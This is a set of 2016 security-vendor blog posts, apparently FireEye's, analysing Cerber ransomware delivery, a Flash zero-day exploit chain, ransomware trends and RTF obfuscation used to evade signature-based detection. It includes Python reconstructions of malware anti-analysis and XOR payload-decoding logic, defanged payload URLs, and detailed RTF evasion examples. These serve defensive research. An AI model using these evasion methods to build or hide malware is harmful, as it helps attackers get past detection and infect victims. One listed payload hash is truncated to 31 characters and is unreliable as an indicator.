If a window is marked as server-side (bServerSideWindowProc is set), the lpfnWndProc function pointer will be trusted by default and can point to user-mode shellcode. The following backtrace shows the kernel calling the exploit’s shellcode:

The shellcode then steals the System process token to elevate a child cmd.exe process.

Mitigation

FireEye products and services identify this activity as Exploit.doc.MVX, Malware.Binary.Doc, PUNCHBUGGY, Malware.Binary.exe, and PUNCHTRACK within the user interfaces.

The latest Windows updates address CVE-2016-0167 and fully protect systems from exploits targeting this vulnerability.

In addition, effective mitigations exist to prevent social engineering attacks that utilize Office macros. Individual users can disable Office macros in their settings and enterprise administrators can enforce a Group Policy to control macro execution for all Office 2016 users. More details about Office macro attacks and mitigations are available here.

Acknowledgements

Thank you to Elia Florio and the Secure@ staff of Microsoft, and Dimiter Andonov, Erye Hernandez, Nick Richard, and Ryann Winters of FireEye for their collaboration on this issue.

Cerber Ransomware Partners with the Dridex Spam Distributor

Cerber ransomware incorporates the unusual feature of “speaking” its ransom message after successfully infecting a user machine and encrypting files. Cerber was first seen in the wild at the end of February 2016 and was observed being delivered mostly via exploit kits (EK), notably using Magnitude and Nuclear Pack’s zero-day Flash exploit.

Figure 1 shows that on April 28, 2016, we observed a significant increase in Microsoft Office document-based macro downloader spam campaigns delivering Cerber ransomware as the payload. Since then, we have observed successor campaigns at similar volumes. More notably, the same distribution framework used to deliver Dridex appears to be delivering this Cerber campaign.

Figure 1. Cerber spam activity trend

Through FireEye’s Dynamic Threat Intelligence (DTI), we observed that one Cerber spam campaign from May 4 was widely spread throughout the world, with the most targets in the United States (see Figure 2).

Figure 2. Geographical distribution of Cerber spam seen by FireEye DTI on May 4

Macro-based Downloader

The malicious document attachment contains a macro that drops a VBScript in the %appdata% path of the machine. The rest of the malicious activities are performed by the dropped VBScript. This method of malware delivery is used instead of sending the VBScript directly as an email attachment, since some email gateway policies might block attached scripts.

The dropped VBScript includes obfuscated code that is used to download the Cerber payload.

The following are some of the obfuscation techniques used, briefly summarized:

  1. Several variables are declared but never used in the code. This junk code is added to deter reverse engineering.
  2. A subroutine is used to delay execution. It increments a counter variable from 1 to 96166237, and after the FOR loop completes, it compares the value of the variable with 96166237 to ensure that the loop executed completely and was not short-circuited (see Figure 3). This is done to detect automated analysis systems.

Figure 3. Delay execution routine in VBScript
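The delay routine in Figure 3 amounts to the following logic, transcribed to Python as a sketch (the counter limit is from the sample; the function name is ours):

```python
def delay_and_verify(limit: int = 96166237) -> bool:
    """Burn time in a counting loop, then confirm it was not short-circuited.

    A sandbox that fast-forwards or skips the loop leaves the counter
    below the expected value, which reveals the analysis environment.
    """
    counter = 0
    for _ in range(limit):
        counter += 1
    # Only proceed to the download stage if the loop really ran to completion.
    return counter == limit
```

With the full 96-million-iteration limit this takes several seconds of real CPU time, which is exactly the point: time-accelerated or loop-skipping sandboxes fail the final comparison.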

HTTP Range Request for Internet Connectivity Check

Before downloading the Cerber payload, a check is performed by the VBScript to ensure that the environment has internet connectivity.

As seen in Figure 4, the VBScript sends an HTTP Range Request to a benign website. It looks for the string “Partial Content” in the HTTP response status text, as “206 Partial Content” is the expected response code for an HTTP Range Request according to RFC7233. If the response code is not correct, the VBScript calls a function to enter an infinite loop. In this way, the execution does not complete without Internet connectivity.

Figure 4. HTTP Range Request check for internet connectivity
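The check in Figure 4 can be sketched in Python as follows (the helper names are ours; the VBScript probes a benign site in the same way):

```python
import urllib.request

def is_partial_content(status: int, reason: str) -> bool:
    """Per RFC 7233, a honoured Range request returns '206 Partial Content'."""
    return status == 206 and "Partial Content" in reason

def check_connectivity(url: str) -> bool:
    """Send an HTTP Range request and verify the expected 206 response."""
    request = urllib.request.Request(url, headers={"Range": "bytes=0-99"})
    try:
        with urllib.request.urlopen(request, timeout=10) as response:
            return is_partial_content(response.status, response.reason)
    except OSError:  # covers URLError, socket timeouts, DNS failures
        return False
```

Where the VBScript enters an infinite loop on failure, the sketch simply returns False; the observable behavior (no payload download without connectivity) is the same.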

Cerber Payload Download Method

After the check for internet connectivity is performed, the VBScript sends another HTTP Range Request to fetch a JPEG file from the URL: hxxp://bsprint[.]ro/images/karma-autumn/bg-footer-bottom.jpg?ObIpcVG=

In the HTTP Request Headers, it sets the value of Range Header to: "bytes=11193-". This indicates to the web server to return only the content starting at offset 11,193 of the JPG file.

The response content of this request is XORed with the key: "amfrshakf". Figure 5 shows the code section corresponding to the decryption routine.

Figure 5. Payload decoding routine
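The download-and-decode step can be sketched as follows (the XOR key and byte offset are taken from the sample; the helper names are ours):

```python
from itertools import cycle

XOR_KEY = b"amfrshakf"  # repeating key observed in the dropped VBScript

def build_range_header(offset: int) -> dict:
    """Ask the server for only the content starting at the given byte offset."""
    return {"Range": f"bytes={offset}-"}

def xor_decode(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; applying it twice restores the original bytes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

# The script requests the tail of the JPG, then XOR-decodes the body:
headers = build_range_header(11193)
assert headers == {"Range": "bytes=11193-"}

# XOR is its own inverse, so encoding and decoding round-trip:
sample = b"MZ\x90\x00"  # e.g. the first bytes of a PE payload
assert xor_decode(xor_decode(sample)) == sample
```

Serving the payload as the tail of an innocuous JPG and XOR-encoding it means neither the full file nor the raw traffic looks like an executable to simple content inspection.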

This technique of downloading the final payload using an HTTP Range Request check has been leveraged in the past by Dridex and Ursnif. We have observed similar obfuscation techniques used in the dropped VBScript as well.

Cerber Ransomware (MD5: 5a2ea6a1d12dcbeb840f5070c7f1e2f8)

There are no significant changes in the behavior of the Cerber payload in this spam campaign when compared to earlier variants. It still uses the ‘.cerber’ file extension for the encrypted files. In this particular sample, it checks the country location, the local language, and whether it is running inside a virtual machine environment, as per its decrypted configuration, as seen in Figure 6.

Figure 6. Configuration for country location, language and virtual environment checks

This variant is also configured to target email, Word documents, and Steam (gaming) related files. It terminates the related processes so that it can access target files that may currently be open.

Figure 7. Configuration for closing processes

The malware asks the victim to visit any of the following websites to pay the ransom and receive further steps to decrypt the encrypted files.

  • hxxp://decrypttozxybarc[.]dconnect[.]eu
  • hxxp://decrypttozxybarc[.]tor2web[.]org
  • hxxp://decrypttozxybarc[.]onion[.]cab
  • hxxp://decrypttozxybarc[.]onion[.]to
  • hxxp://decrypttozxybarc[.]onion[.]link

While examining the decrypted configuration file, we found indications of the possible addition of a spambot module. The malware operator can set options for the email attachment, subject and the email body in the configuration, as seen in Figure 8. In this sample, this feature seems to be in its development or test stage. In order for the malware to be used as a spambot, it would also need a list of email addresses to send the spam email.

Figure 8. Possible spambot related configuration

Conclusion

By partnering with the same spam distributor that has proven its capability by delivering Dridex on a large scale, Cerber is likely to become another serious email threat similar to Dridex and Locky. This is in addition to the fact that Cerber is already known to be delivered through exploit kits. We advise users to be cautious when opening documents and other files from unknown senders, especially when asked to enable macros.

Ransomware authors are constantly upgrading their craft in order to maximize profits. An addition of a spambot module, for example, can add value to their ransomware, since victim machines will also be used as spam email distributors.

Hashes

Spam email

ace933ac89b5cdb6937bf1a43e265d9eb4cb11eead52be2709c4df2194ee3ba0
191db27efb10f96f2fcabcd6d5d759433b687b89a8b6fd90c123fe379b8b98eb
c5aa84c52764f3583e78a62adf8ed8bfda409ff4c8c306a155b82d7da66d0e95
3d0e5ea98fead3c28c6a9f4c6519e6488c4a791e1a40f701bb4fd681163804fe
72ac6b80deaeea9081ebed7edf7c9943813afbbbbbc365e1a781efa04d5765fc
304c21c77b52dce69bddc421b4166627a37068e18296920ac09bbd7cd4962748

Cerber payload

c6f29582e489506ccb14f19fdfa7c16

CVE-2016-4117: Flash Zero-Day Exploited in the Wild

On May 8, 2016, FireEye detected an attack exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-4117) and reported the issue to the Adobe Product Security Incident Response Team (PSIRT). Adobe released a patch for the vulnerability in APSB16-15 just four days later.

Attackers had embedded the Flash exploit inside a Microsoft Office document, which they then hosted on their web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload. With this configuration, the attackers could disseminate their exploit via URL or email attachment. Although this vulnerability resides within Adobe Flash Player, threat actors designed this particular attack for a target running Windows and Microsoft Office.

Attack Summary

Upon opening the document, the exploit downloads and executes a payload from the attacker’s server. To avoid suspicion, the attacker then shows the victim a decoy document. The full exploit chain proceeds as follows:

  1. The victim opens the malicious Office document.
    1. The Office document renders an embedded Flash file.
      1. If the Flash Player version is older than 21.0.0.196, the attack aborts.
      2. Otherwise, the attack runs the encoded Flash exploit.
  2. The exploit runs embedded native shellcode.
    1. The shellcode downloads and executes a second shellcode from the attacker’s server.
  3. The second shellcode:
    1. Downloads and executes malware.
    2. Downloads and displays a decoy document.
  4. The malware connects to a second server for command and control (C2) and waits for further instructions.

This process is shown in Figure 1.

Figure 1 Attack flow chart
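The version gate in step 1a can be sketched with a simple tuple comparison (the threshold is from the chain above; the helper names are ours):

```python
MIN_FLASH_VERSION = (21, 0, 0, 196)

def parse_version(version: str) -> tuple:
    """Split a dotted version string into a tuple of integers."""
    return tuple(int(part) for part in version.split("."))

def exploit_should_run(flash_version: str) -> bool:
    """Python compares tuples field by field, left to right."""
    return parse_version(flash_version) >= MIN_FLASH_VERSION

assert not exploit_should_run("21.0.0.182")  # older: the attack aborts
assert exploit_should_run("21.0.0.196")
```

Gating on a minimum version ensures the encoded exploit only fires against builds whose internals match the attacker's assumptions, avoiding crashes that would draw attention.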

CVE-2016-4117 Exploitation Details

An out-of-bounds read vulnerability exists in the com.adobe.tvsdk.mediacore.timeline.operations.DeleteRangeTimelineOperation module. By extending the DeleteRangeTimelineOperation class, one can define a property that conflicts with the inner interface name. In this exploit, the author chose “placement” as the property name, as shown in Figure 2. Referencing the interface causes the ActionScript Virtual Machine to call the internal function getBinding to get a bind id. Because the “placement” property conflicts with the “placement” interface name, the attacker can manipulate the bind id, and ultimately induce type confusion.

Figure 2 Placement interface vs. class definition

Memory layout

Before triggering the vulnerability, the exploit defines an object that extends ByteArray. The definition is modified to contain easily distinguishable values that aid in locating objects in memory. Then, the exploit allocates a set of these objects to control the memory layout (Figure 3).  



Figure 3 Prepare heap memory layout

These objects look as follows when in memory:

The exploit then uses the type-confused DeleteRangeTimelineOperation object to read out of bounds and find one of the extended ByteArray objects by looking for the pre-defined property values (shown in Figure 4), then manipulates its data buffer pointer to point to an attacker-controlled area.

Figure 4 Finding target ByteArray

With the ability to read and write individual values in the extended ByteArray object, the attacker can corrupt one of the objects to extend its length to 0xffffffff, and its data buffer to address 0. Future reads and writes to the corrupted ByteArray may then access all of the user space memory (Figure 5).

Figure 5 RW primitive and execute shellcode

Code execution

Once the exploit can read and write arbitrarily in memory, it executes embedded shellcode. The shellcode downloads a second stage of shellcode from the attacker’s server, which then downloads and executes the malware payload and displays the decoy document.

Conclusion

CVE-2016-4117 was recently exploited in targeted attacks. Just four days after notification, Adobe released a security update for Flash Player that patched the underlying vulnerability. Users who require Flash Player in their environment should download this timely patch to protect their systems from exploitation. Additionally, Flash Player users could consider employing additional mitigations, such as EMET from Microsoft, to make their systems more difficult and costly to exploit.


Ransomware Activity Spikes in March, Steadily Increasing Throughout 2016

Cyber extortion for financial gain is typically carried out in one of two ways. The first method is a business disruption attack – a category we discussed at length in M-Trends 2016. In this type of attack, threat actors target an organization’s critical business systems, capture confidential data and threaten to do something malicious with that data (such as expose, delete, or encrypt it) unless a ransom is paid. This method is generally more targeted, requires a greater deal of finesse on the part of the threat actors, and often has a greater potential payout.

Ransomware is the other common method of cyber extortion for financial gain. Ransomware is a type of malware that prevents users from interacting with their files, applications or systems until a ransom is paid, typically in the form of an anonymous currency such as Bitcoin. While individual computer and mobile device users have long been targets of ransomware, the threat has expanded. Ransomware has gained publicity in recent months through mainstream media coverage of ransomware attacks against organizations, namely hospitals.

While the end goal is the same – some type of financial payout to the attacker – not all ransomware operates the same way. The file-encrypting variety is perhaps the most dangerous. This is because the targeted files, which often contain users’ or organizations’ most valuable data, become useless without the decryption key. The issue is compounded because paying the ransom offers no guarantee that the files will be unlocked, thus making frequent backups the best defense against ransomware.

Since the average ransom demanded from an individual user is relatively low (typically a few hundred dollars, if that), threat actors distributing ransomware typically follow the “spray and pray” tactic of sending out as many lures as possible – emails with malicious attachments or links to malicious websites, for example – to maximize their potential gains.

Ransomware Spike in March

Based on data from FireEye Dynamic Threat Intelligence, ransomware activity has been rising fairly steadily since mid-2015. We observed a noticeable spike in March 2016. Figure 1 depicts the percentage of ransomware compared to all malware detected on FireEye products from October 2015 to March 2016.

Figure 1: Ransomware detections from October 2015 to March 2016

The spike is noteworthy, and consistent with other observations. In March 2016, FireEye Labs detected a significant rise in Locky ransomware downloaders due to an email spam campaign targeting users in more than 50 countries. The malicious email attachments pretended to contain an invoice or a picture, but opening the attachment led to an infection instead.

Ransomware in the Media

There is no denying the satisfaction an attacker feels when their exploits make the news. For threat actors distributing ransomware, the satisfaction is even greater when the headlines report that the victim paid the ransom. A recent blitz of ransomware reports in the media – as well as the follow-up success stories – may have spurred other attackers to get in on the action, possibly resulting in the March ransomware activity spike. The Petya ransomware, for instance, includes links to recent media articles on its ransom payment page, as shown in Figure 2.

Figure 2: Petya ransomware payment page advertising links to recent media articles, as uncovered by FireEye Threat Intelligence in 2016

Hollywood Presbyterian Medical Center incident

In early February, Hollywood Presbyterian Medical Center (HPMC) was in the media spotlight after their systems became infected with file-encrypting ransomware. Midway through the month, Allen Stefanek, president and CEO, wrote that staff had trouble accessing the network beginning Feb. 5. He explained that malware locked access to certain computer systems and prevented the sharing of communications electronically, and indicated that a ransom of 40 Bitcoins had been requested (approximately $17,000 at the time).

“The quickest and most efficient way to restore our systems and administrative functions was to pay the ransom and obtain the decryption key,” Stefanek wrote. “In the best interest of restoring normal operations, we did this.” HPMC restored its electronic medical record system and cleared all systems of the malware by Feb. 15.

Continued targeting of hospitals

Attackers may have taken a hint that hospitals are a lucrative target. Later in February, The Register reported that file-encrypting ransomware infected the systems of Lukas Hospital and Klinikum Arnsberg hospital – both in Germany. Then in March, Ars Technica reported that data at Union Memorial Hospital in Maryland – as well as other MedStar hospitals in the Washington, DC area – were encrypted by ransomware, and that the requested ransom was 45 Bitcoins, or about $18,500 at the time.

The targeting of hospitals is no surprise. Cyber criminals have been increasingly turning to industries such as healthcare that possess critical data but may have limited investment in security across their enterprise. With hospitals, budget dollars often go towards surgery wards, emergency care centers and supplies for a large number of patients – not security. This makes for a tricky issue, since hospitals cannot operate without the necessary patient data stored in their systems.

Other Factors Influencing Uptick in Ransomware Activity

High-profile media coverage of ransomware is certainly attracting attackers, but that is not the only factor driving the uptick in activity. The following are some additional factors contributing to the increase:

  • Relatively high profit margins coupled with the relatively low overhead required to operate a ransomware campaign have bolstered the appeal of this particular attack type, fueling market demand for tools and services corresponding to its propagation. For example, in 2015 we observed a small-scale ransomware operation that nevertheless likely netted the perpetrators about $75,000.
  • The success of prolific ransomware families such as CryptoWall has provided a blueprint for aspiring ransomware developers, showcasing increasing profit margins and campaign sustainability. According to the FBI's Internet Crime Complaint Center (IC3), CryptoWall generated identified victim losses totaling more than $18 million between April 2014 and June 2015.
  • The emergence since mid-2015 of several new ransomware variants adopting a Ransomware-as-a-Service (RaaS) framework, a phenomenon likely driven by the competitive development of quality goods and services within the cyber crime ecosystem. Based on multiple factors, RaaS offerings – which are uniquely poised to capitalize on current underground marketplace demand for ransomware – are highly likely to fuel an increasing number of ransomware infections.

Ransomware Variants

Throughout this discernible uptick in ransomware activity from mid-2015 to early 2016, FireEye has observed significant growth and maturation of the ransomware threat landscape – predominantly involving the proliferation of myriad new variants.

Prolific Ransomware Families

We continue to observe the sustained distribution of multiple, well-established ransomware families used in both geographically targeted and mass infection campaigns. In multiple cases these renowned variants, such as CryptoWall and TorrentLocker, spawned updated variants with improvements in either encryption capabilities or obfuscation techniques. These established ransomware brands will continue to pose a significant threat to global enterprises, as malware functionality, encryption techniques and counter-mitigation measures are adapted and successfully introduced into updated variants. Examples include:

  • TorrentLocker: Throughout 2015, FireEye observed continued distribution of TorrentLocker, a ransomware family based on both CryptoLocker and CryptoWall. According to multiple open-source reports, TorrentLocker has been active since at least early 2014 and is most often distributed in geographically-specific spam campaigns.
  • CTB-Locker: CTB-Locker – a name that represents the key elements of the ransomware, namely Curve (for Elliptic Curve Cryptography), Tor and Bitcoin – was first seen around mid-2014 and remained active throughout 2015. During this reporting period, we observed multiple campaigns propagating CTB-Locker and its variants, including CTB-Locker distributors capitalizing on Windows 10 releases and free upgrades by sending out spam campaigns citing Windows 10 upgrades in mid-2015.

Novel Ransomware Variants

We have also observed several new ransomware variants that incorporate a range of new tactics, techniques and procedures (of varying degrees of technical practicality). Based on the increased growth in this area, we expect ransomware developers to continue equipping ransomware variants with novel features in order to expand targeted platforms and increase conversion ratios.

  • Chimera: The operators behind the Chimera ransomware not only used the malware to encrypt victims’ files, but further threatened to publish the encrypted data if victims failed to pay the ransom. The threat actors began targeting German-based small and medium-sized business enterprises around mid-September 2015.
  • Ransom32: Ransom32, first publicly reported in late December 2015, is purportedly one of the first ransomware variants based entirely on JavaScript, potentially allowing for cross-operating system (OS) compatibility and packaging for both Linux and Mac OS.
  • LowLevel04: According to open-source reporting, operators of LowLevel04 purportedly spread the ransomware using the unconventional infection mechanism of exploiting Remote Desktop and Terminal Services.
  • Linux.Encoder.1: According to open-source reporting, Linux.Encoder.1 debuted in late 2015 as one of the first ransomware variants targeting Linux web-based servers. While the encryption capabilities of the earliest variants proved to be suspect – with multiple reports alleging faults in its predictable encryption key – the targeting associated with this malware family represents a deviation from more traditional Windows-based attacks.

Outlook and Implications

We expected to see the ransomware threat landscape sustain, if not exceed, levels observed in 2015 – and so far we have been right. Cyber extortion has gained significant notoriety, with illicit profits garnered from highly publicized campaigns undoubtedly resonating among cyber criminals. Recent campaigns in which targeted victims paid the ransom demand reinforce the legitimacy and popularity of this particular attack method.

One of the most worrying threats concerns the targeted deployment of ransomware after the attackers have already gained a foothold in the network. In these cases, threat actors may be able to conduct reconnaissance to strategically disable or delete backups and identify those systems most critical to an organization’s operations before deploying the ransomware. To increase the difficulty of such an attack, enterprises are encouraged to properly segment networks and implement access controls. In addition, enterprises should evaluate backup strategies regularly and test those backups to ensure that recovery is successful. Finally, copies of backups should be stored offsite in case onsite backups are targeted.

Learn more about ransomware during our webinar on May 19, 2016, at 11:00am EDT. You can register here.

How RTF malware evades static signature-based detection

History

Rich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated, which makes the development of a safe RTF parser challenging. Some notorious vulnerabilities, such as CVE-2010-3333 and CVE-2014-1761, were caused by errors in implementing RTF parsing logic.

In fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. CVE-2012-0158 and CVE-2015-1641 are two typical examples of such vulnerabilities – their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.

Another type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.

Plenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature-based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.

In this blog, we present some common evasive tricks used by malicious RTFs.

Common obfuscations

Let’s discuss a couple different RTF obfuscation strategies.

1.     CVE-2010-3333

This vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability targeted an Ambassador of India.

The root cause of this vulnerability is a stack-based buffer overflow in the Microsoft RTF parser's procedure for parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but because many old versions of Microsoft Office were affected, the threat it posed was very high.

The Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:

{\rtf1{\shp{\sp{\sn pFragments}{\sv A;B;[word1][word2][word3][hex value array]}}}}

Because pFragments is rarely seen in normal RTF files, many firms simply detect this keyword and the oversized value right after \sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. Against in-the-wild samples, however, such signature-based detection is insufficient. For instance, the malicious RTF targeting the Ambassador of India is a good sample to illustrate the downside of signature-based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of space limitations – there were plenty of dummy symbols such as { } in the initial sample.

Figure 1. Obfuscated sample of CVE-2010-3333

As we can see, the pFragments keyword has been split into many pieces, which bypasses most signature-based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only are the split pieces of \sn combined together, pieces of \sv are combined as well. The following example demonstrates this obfuscation:

Obfuscated

{\rtf1{\shp{\sp{\sn2 pF}{\sn44 ragments}{\sv 1;28}{\sv ;fffffffffffff….}}}}

Clear

{\rtf1{\shp{\sp{\sn pFragments}{\sv 1;28 ;fffffffffffff….}}}}
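To hunt for keywords split in this way, a triage script has to reassemble the fragments before matching. The following is a minimal Python sketch of our own (not a production RTF parser) that concatenates the pieces of \sn and \sv within a shape property group the same way the parser does:

```python
import re

def combine_shape_props(rtf: str) -> str:
    """Concatenate the split \\snN and \\sv pieces of a shape property
    group so that a keyword like 'pFragments' becomes visible again."""
    # Match groups such as {\sn2 pF} or {\sv 1;28} and capture name + value
    pieces = re.findall(r'{\\(sn|sv)\d*\s+([^{}]*)}', rtf)
    name = ''.join(v for k, v in pieces if k == 'sn')
    value = ''.join(v for k, v in pieces if k == 'sv')
    return '{\\sn %s}{\\sv %s}' % (name, value)

obf = r'{\rtf1{\shp{\sp{\sn2 pF}{\sn44 ragments}{\sv 1;28}{\sv ;ffff}}}}'
print(combine_shape_props(obf))  # {\sn pFragments}{\sv 1;28;ffff}
```

A signature for pFragments can then be applied to the normalized output rather than to the raw file bytes.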

Attackers can come up with a variety of ideas beyond the aforementioned sample to defeat static signature-based detection.

Notice the mixed '\x0D' and '\x0A' bytes – they are '\r' and '\n', and the RTF parser simply ignores them.

2.     Embedded objects

Users can embed a variety of objects into RTF files, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE-related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be carried in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embed PE files inside RTF documents. This is a bad practice because it cultivates poor habits in users.

Let’s take a glance at the embedded object syntax first:

<objtype> specifies the type of object. \objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let’s take it as an example. The data right after \objdata is OLE1 native data, defined as:

<data>

(\binN #BDATA) | #SDATA

#BDATA

Binary data

#SDATA

Hexadecimal data

Attackers would try to insert various elements into the <data> to evade static signature detection. Let’s take a look at some examples to understand these tricks:

a.     For example, \binN can be swapped with #SDATA. The data right after \binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into the hex values 313233 in memory.

Obfuscated

{\object\objocx\objdata \bin3 123}

Clear

{\object\objocx\objdata 313233}

Let’s look at another example:

Obfuscated

{\object\objocx\objdata \bin41541544011100001100000000000000000000000000000000000000000003 123}

Clear

{\object\objocx\objdata 313233}

If we try to call atoi or atol on the long numeric parameter string after \bin in the example above, we will get 0x7fffffff, while its true value should be 3.

This happens because \bin takes a 32-bit signed integer numeric parameter. You might assume that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that is not the case. Microsoft Word’s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word’s RTF parser is implemented as follows:
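A Python emulation consistent with the behavior described above (32-bit wrap-around accumulation rather than the saturating C runtime atoi) looks like this; it is our own sketch, not Word’s actual code:

```python
def word_rtf_atoi(s: str) -> int:
    """Emulate Word's numeric parameter conversion: digits accumulate with
    ordinary 32-bit wrap-around instead of the C runtime's saturation."""
    val = 0
    for ch in s:
        if not ch.isdigit():
            break
        val = (val * 10 + int(ch)) & 0xFFFFFFFF  # wrap, don't saturate
    # interpret the low 32 bits as a signed integer
    return val - 0x100000000 if val >= 0x80000000 else val

huge = "41541544011100001100000000000000000000000000000000000000000003"
# The long run of zeros makes every high-order digit vanish modulo 2**32,
# leaving only the trailing 3.
print(word_rtf_atoi(huge))  # 3
```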

b.     \ucN and \uN
Both of these are ignored, and the characters right after \uN are not skipped.

c.     The whitespace characters 0x0D (\r), 0x0A (\n) and 0x09 (\t) are ignored.

d.     Escaped characters
RTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:


\{
\%
\+
\-
\\
\'hh

All of these escaped characters are ignored, but there’s an interesting situation with \'hh. Let’s look at an example first:

Obfuscated

{\object\objocx\objdata 341\'112345 }

Clear

{\object\objocx\objdata 342345}

When the parser encounters \'11, it treats the 11 as an encoded hex byte. This byte is decoded and then discarded before parsing of the rest of \objdata continues. The 1 preceding \'11 is also discarded: it was the high 4 bits of a pending octet, and when the parser hits \'11 the internal state for decoding the hex string into binary bytes is reset, so the pending high nibble is thrown away.

The table below shows the processing procedure; the two 1s in the yellow rows come from \'11. It’s clear that the interleaved \'11 disorders the state variable, which causes the high 4 bits of the second byte to be discarded:
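This state machine can be modeled in a few lines of Python. The following is an illustrative sketch of the decoding behavior described above, not the actual parser code:

```python
HEX = set("0123456789abcdefABCDEF")

def decode_objdata(s: str) -> bytes:
    """Model of the parser's hex-to-binary state machine: a \\'hh escape is
    decoded, its byte discarded, and the pending high nibble is reset."""
    out, high, i = [], None, 0
    while i < len(s):
        if s.startswith("\\'", i):
            i += 4        # consume \'hh; its decoded byte is thrown away...
            high = None   # ...and the nibble state resets
            continue
        c = s[i]
        if c in HEX:
            if high is None:
                high = int(c, 16)
            else:
                out.append(high * 16 + int(c, 16))
                high = None
        i += 1            # whitespace and other ignorable bytes are skipped
    return bytes(out)

print(decode_objdata(r"341\'112345").hex())  # 342345
```

The example reproduces the table: 34 is emitted, the pending 1 and the escape’s 11 are discarded, then 23 and 45 follow.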

e.     Oversized control word and numeric parameter
The RTF specification says that a control word’s name cannot be longer than 32 letters and that the numeric parameter associated with a control word must be a signed 16-bit or 32-bit integer, but Microsoft Office’s RTF parser does not strictly obey the specification. Its implementation reserves only a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. Characters beyond the maximum buffer length (0xFF) do not remain part of the control word or parameter string; instead, the control word or parameter is terminated at that point.

In the first obfuscated example, the length of the oversized control word is 0xFE. Adding the null terminator brings the control word string to the maximum length of 0xFF, so the remaining data belongs to \objdata.

For the second obfuscated example, the total length of the \bin control word and its parameter is 0xFD; adding their null terminators brings the length to 0xFF.

f.     Additional techniques

The program uses the last \objdata control word in a list, as shown here:

Obfuscated

{\object\objocx\objdata 554564{\*\objdata 4444}54545} OR

{\object\objocx\objdata 554445\objdata 444454545} OR

{\object\objocx{{\objdata 554445}{\objdata 444454545}}}

Clear

{\object\objocx\objdata 444454545}

As we can see here, control words other than \binN are ignored:

Obfuscated

{\object\objocx\objdata 44444444{\par2211 5555}6666}       OR

{\object\objocx\objdata 44444444{\datastore2211 5555}6666} OR

{\object\objocx\objdata 44444444\datastore2211 55556666}   OR

{\object\objocx\objdata 44444444{\unknown2211 5555}6666}   OR

{\object\objocx\objdata 44444444\unknown2211 55556666}

Clear

{\object\objocx\objdata 4444444455556666}

There is another special case that makes the situation a bit more complicated: the control symbol \*. The RTF specification describes this control symbol as follows:

    Destinations added after the 1987 RTF Specification may be preceded by the control symbol \* (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word.

Let’s take a look at how it can be used in obfuscations:

1.      

Obfuscated

{\object\objocx\objdata 44444444{\*\par314 5555}6666}

Clear

{\object\objocx\objdata 4444444455556666}

\par is a known control word that does not accept any data, so the RTF parser skips the control word and only the data that follows remains.

2.

Obfuscated

{\object\objocx\objdata 44444444{\*\datastore314 5555}6666}

Clear

{\object\objocx\objdata 444444446666}

The RTF parser also recognizes \datastore and understands that it can accept data, so the data that follows is consumed by \datastore.

3.

Obfuscated

{\object\objocx\objdata 44444444{\*\unknown314 5555}6666}

Clear

{\object\objocx\objdata 444444446666}

For an analyst, it’s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to an OLE2 structured storage object. Here’s the prototype of OleConvertOLESTREAMToIStorage:

The object pointed to by lpolestream contains a pointer to the OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data, which has already been de-obfuscated by the RTF parser:

The last command, .writemem, writes a section of memory to d:\evil_objdata.bin. You can specify another path as you wish; 0e170020 is the start address of the memory range, and 831b6 is its size.

Most of the \objdata obfuscation techniques also apply to embedded images, but for images there seems to be no obvious choke point like OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using a data breakpoint; that will reveal the best point at which to dump the whole data.

Conclusion

Our adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversaries perform obfuscation can in turn help us improve our detection of such malware.

Acknowledgements

Thanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.

Targeted Attacks against Banks in the Middle East

Introduction

In the first week of May 2016, FireEye’s Dynamic Threat Intelligence (DTI) identified a wave of emails containing malicious attachments sent to multiple banks in the Middle East region. The threat actors appear to be performing initial reconnaissance against would-be targets, and the attacks caught our attention because they used unique scripts not commonly seen in crimeware campaigns.

In this blog we discuss in detail the tools, tactics, techniques and procedures (TTPs) used in these targeted attacks.

Delivery Method

